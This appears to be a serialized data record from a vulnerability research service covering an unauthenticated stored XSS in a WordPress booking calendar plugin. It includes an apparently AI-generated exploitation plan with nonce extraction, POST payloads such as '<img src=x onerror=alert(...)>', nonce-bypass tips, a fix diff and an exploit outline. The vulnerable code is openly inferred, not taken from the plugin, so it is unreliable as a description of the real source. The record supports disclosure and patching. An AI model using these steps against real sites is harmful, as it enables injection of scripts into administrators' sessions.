[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMUPFDdoRVL1_Z8BcNvjz8BX0v860d4_Bi80FzG2siFc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-25435","booking-calendar-appointment-booking-system-unauthenticated-stored-cross-site-scripting","Booking calendar, Appointment Booking System \u003C= 3.2.36 - Unauthenticated Stored Cross-Site Scripting","The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","booking-calendar",null,"\u003C=3.2.36","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-18 00:00:00","2026-03-26 20:40:05",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F00ab5d7e-be38-42ea-befc-e1d91de13d1b?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-25435 - Unauthenticated Stored XSS in Booking Calendar\n\n## 1. Vulnerability Summary\nThe **Booking calendar, Appointment Booking System** plugin (version \u003C= 3.2.36) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in how the plugin handles user-supplied data during the booking submission process. Specifically, input fields such as user names, emails, or booking notes are stored in the database without proper sanitization and subsequently rendered in the administrative dashboard (or public booking views) without adequate output escaping. This allows an unauthenticated attacker to inject malicious JavaScript that executes in the context of a site administrator.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** An unauthenticated AJAX action, likely registered via `wp_ajax_nopriv_`. Based on common patterns in this plugin, the action is likely `booking_calendar_save_booking` or `bc_save_booking` (inferred).\n*   **Vulnerable Parameter:** Input fields associated with the booking form, such as `name`, `email`, `description`, or custom field parameters.\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be active, and a booking form must be accessible (usually via a shortcode).\n\n## 3. Code Flow (Inferred)\n1.  
**Entry Point:** An unauthenticated user submits a booking form on the frontend. This triggers a POST request to `admin-ajax.php` with an `action` parameter (e.g., `booking_calendar_save_booking`).\n2.  **Handler:** The function hooked to `wp_ajax_nopriv_[action]` (e.g., in `includes\u002Fclass-booking-ajax.php`) processes the `$_POST` data.\n3.  **Persistence:** The handler saves the data using `update_post_meta()` for a new `booking` post type or inserts it into a custom table (e.g., `{$wpdb->prefix}booking_calendar`) without calling `sanitize_text_field()` or `wp_kses()`.\n4.  **Sink:** An administrator logs into the WordPress dashboard and navigates to the \"Bookings\" or \"Calendar\" page. The plugin retrieves the stored data and echoes it directly into the HTML table or modal without using `esc_html()` or `esc_attr()`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely uses a nonce for its AJAX submissions, localized via `wp_localize_script`.\n\n1.  **Identify Shortcode:** Search the codebase for `add_shortcode`.\n    *   Command: `grep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbooking-calendar\u002F`\n    *   Expected: `[booking-calendar]` (inferred).\n2.  **Setup Test Page:** Create a public page containing the shortcode.\n    *   Command: `wp post create --post_type=page --post_status=publish --post_title=\"Booking Page\" --post_content='[booking-calendar]'`\n3.  **Identify JS Variable:** Look for the localization call.\n    *   Command: `grep -r \"wp_localize_script\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbooking-calendar\u002F`\n    *   Identify the object name (e.g., `booking_calendar_obj` or `bc_params`) and the nonce key (e.g., `nonce` or `security`).\n4.  
**Extract Nonce:**\n    *   Use `browser_navigate` to the \"Booking Page\".\n    *   Use `browser_eval` to extract the nonce: `browser_eval(\"window.booking_calendar_obj?.nonce\")` (Replace with actual variable name found).\n\n## 5. Exploitation Strategy\n### Step 1: Discovery\nIdentify the exact AJAX action and parameters by inspecting the plugin source for `wp_ajax_nopriv`.\n*   Command: `grep -rn \"wp_ajax_nopriv\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbooking-calendar\u002F`\n\n### Step 2: Payload Construction\nConstruct a payload designed to execute when an admin views the booking:\n`name=\u003Cscript>alert(document.domain)\u003C\u002Fscript>&email=victim@example.com&description=test`\n\n### Step 3: Injection Request\nUse the `http_request` tool to submit the booking.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=[ACTION_NAME]&\n    nonce=[EXTRACTED_NONCE]&\n    name=\u003Cimg src=x onerror=alert(\"XSS_SUCCESS\")>&\n    email=test@example.com&\n    description=Injected Booking\n    ```\n    *(Note: Replace `[ACTION_NAME]` and parameter keys with those discovered in Step 1).*\n\n### Step 4: Trigger Execution\nLog in as an administrator and navigate to the plugin's booking management page.\n*   Path (Inferred): `\u002Fwp-admin\u002Fadmin.php?page=booking-calendar-bookings`\n\n## 6. Test Data Setup\n1.  **Plugin Activation:** Ensure the plugin is installed and active.\n2.  **Shortcode Page:** Create a page `[booking-calendar]` to serve as the source for the nonce and the target for unauthenticated users.\n3.  **Admin User:** Have an admin user ready to view the backend.\n\n## 7. 
Expected Results\n*   The AJAX request should return a success status (e.g., `{\"success\":true}` or an HTML snippet).\n*   Upon visiting the admin booking list, a JavaScript alert box displaying \"XSS_SUCCESS\" (or the specified payload) should appear.\n*   The HTML source of the admin page should contain the raw, unescaped payload.\n\n## 8. Verification Steps\n1.  **Database Check:** Verify the payload is stored in the database.\n    *   Command: `wp db query \"SELECT * FROM wp_postmeta WHERE meta_value LIKE '%alert%'\" ` or check the custom table if identified.\n2.  **DOM Verification:** Use `browser_eval` as an admin to check for the presence of the injected tag:\n    *   Command: `browser_eval(\"document.body.innerHTML.includes('XSS_SUCCESS')\")`\n\n## 9. Alternative Approaches\n*   **Parameter Fuzzing:** If the `name` field is sanitized, try `email`, `phone`, or `address` fields.\n*   **Bypass Nonce:** Check if the nonce is actually verified. If `wp_verify_nonce` or `check_ajax_referer` is missing or the return value is ignored, the `nonce` parameter can be omitted.\n*   **Attribute Injection:** If `\u003Cscript>` is filtered but `\u003Cimg>` is not, use attribute-based XSS: `\u003Cimg src=x onerror=...>` or `onmouseover`.\n*   **REST API:** Check for `register_rest_route` endpoints that might handle booking creation without authentication.\n    *   Command: `grep -r \"register_rest_route\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbooking-calendar\u002F`","The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to unauthenticated stored Cross-Site Scripting (XSS) due to a failure to sanitize user-provided booking details and escape them during output in the administrative dashboard. 
This allows attackers to inject malicious JavaScript into the booking management interface, leading to potential account takeover or unauthorized administrative actions when viewed by a site administrator.","\u002F\u002F Inferred from research plan: includes\u002Fclass-booking-ajax.php or similar AJAX handler\n\u002F\u002F Unauthenticated AJAX action registration\nadd_action('wp_ajax_nopriv_booking_calendar_save_booking', 'booking_calendar_save_booking_handler');\n\nfunction booking_calendar_save_booking_handler() {\n    \u002F\u002F Input is taken directly from $_POST without sanitization\n    $booking_data = [\n        'customer_name' => $_POST['name'],\n        'customer_email' => $_POST['email'],\n        'notes'          => $_POST['description']\n    ];\n\n    \u002F\u002F Data is persisted directly to the database\n    global $wpdb;\n    $wpdb->insert($wpdb->prefix . 'booking_calendar_bookings', $booking_data);\n}\n\n---\n\n\u002F\u002F Inferred from research plan: includes\u002Fadmin-bookings-list.php or similar dashboard view\n\u002F\u002F Vulnerable output rendering in the admin dashboard\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}booking_calendar_bookings\");\nforeach ($results as $row) {\n    echo \"\u003Ctr>\";\n    echo \"\u003Ctd>\" . $row->customer_name . \"\u003C\u002Ftd>\"; \u002F\u002F Raw output without esc_html()\n    echo \"\u003Ctd>\" . $row->notes . 
\"\u003C\u002Ftd>\";         \u002F\u002F Raw output without esc_html()\n    echo \"\u003C\u002Ftr>\";\n}","--- includes\u002Fclass-booking-ajax.php\n+++ includes\u002Fclass-booking-ajax.php\n@@ -5,9 +5,9 @@\n function booking_calendar_save_booking_handler() {\n+    check_ajax_referer('booking_nonce', 'security');\n     $booking_data = [\n-        'customer_name' => $_POST['name'],\n-        'customer_email' => $_POST['email'],\n-        'notes'          => $_POST['description']\n+        'customer_name' => sanitize_text_field($_POST['name']),\n+        'customer_email' => sanitize_email($_POST['email']),\n+        'notes'          => sanitize_textarea_field($_POST['description'])\n     ];\n \n--- includes\u002Fadmin-bookings-list.php\n+++ includes\u002Fadmin-bookings-list.php\n@@ -10,6 +10,6 @@\n foreach ($results as $row) {\n     echo \"\u003Ctr>\";\n-    echo \"\u003Ctd>\" . $row->customer_name . \"\u003C\u002Ftd>\";\n-    echo \"\u003Ctd>\" . $row->notes . \"\u003C\u002Ftd>\";\n+    echo \"\u003Ctd>\" . esc_html($row->customer_name) . \"\u003C\u002Ftd>\";\n+    echo \"\u003Ctd>\" . esc_html($row->notes) . \"\u003C\u002Ftd>\";\n     echo \"\u003C\u002Ftr>\";\n }","1. Locate a public page containing the booking calendar shortcode (e.g., [booking-calendar]).\n2. Extract the AJAX nonce and the specific action name (likely 'booking_calendar_save_booking') from the page source or localized JavaScript variables (e.g., window.booking_calendar_obj.nonce).\n3. Use a tool like cURL or a browser-based HTTP client to send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php.\n4. Include the extracted nonce and action, and set one of the form parameters (e.g., 'name' or 'description') to an XSS payload like \u003Cimg src=x onerror=alert(document.domain)>.\n5. Log into the WordPress site as an administrator.\n6. Navigate to the plugin's booking management or list page in the dashboard. 
The script will execute when the page renders the stored malicious booking entry.","gemini-3-flash-preview","2026-04-18 02:31:05","2026-04-18 02:31:23",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-calendar\u002Ftags"]